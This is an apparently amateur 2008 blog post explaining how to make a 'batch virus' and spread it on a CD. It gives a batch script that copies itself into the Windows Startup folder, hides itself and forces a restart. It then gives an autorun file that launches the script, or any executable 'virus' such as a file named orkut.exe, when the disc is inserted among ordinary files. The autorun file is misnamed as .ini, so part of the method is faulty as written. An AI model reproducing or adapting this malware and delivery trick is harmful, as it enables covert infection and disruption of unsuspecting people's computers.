Wednesday, July 30, 2008

How to send batch virus with a cd

For this we need 3 file:

* 1 a batch file
* ini file
* ico file (icon file )

**************making the batch file **************
@echo off
copy pic.bat "C:\Documents and Settings\All Users\Start Menu\Programs\Startup"
attrib +h pic.bat
shutdown -r -t 0900 -c "need help? help help help me creat by me "

and sav this as pic.bat

**************making the ico file***************

no need to mak a ico file u can easily find find it in ur pc
search as *.ico

and rename it as dragon.ico

*****************making the ini file*****************
open a not pad and

[autorun]
open=pic.bat
icon=dragon.ico

sav it as autorun.ini

after making these files u can store them in cd with other ordinary file
and see what happen

*** Send a exe virus file ***

same way as d above one.....

just tak the file as orkut.exe[virus]

*****************making the ini file*****************

open notepad and type :

[autorun]
open=orkut.exe
icon=dragon.ico

save it as autorun.ini

**************making the ico file***************

no need to mak a ico file u can easily find find it in ur pc
search as *.ico

and rename it as dragon.ico

n write them to a cd

No comments: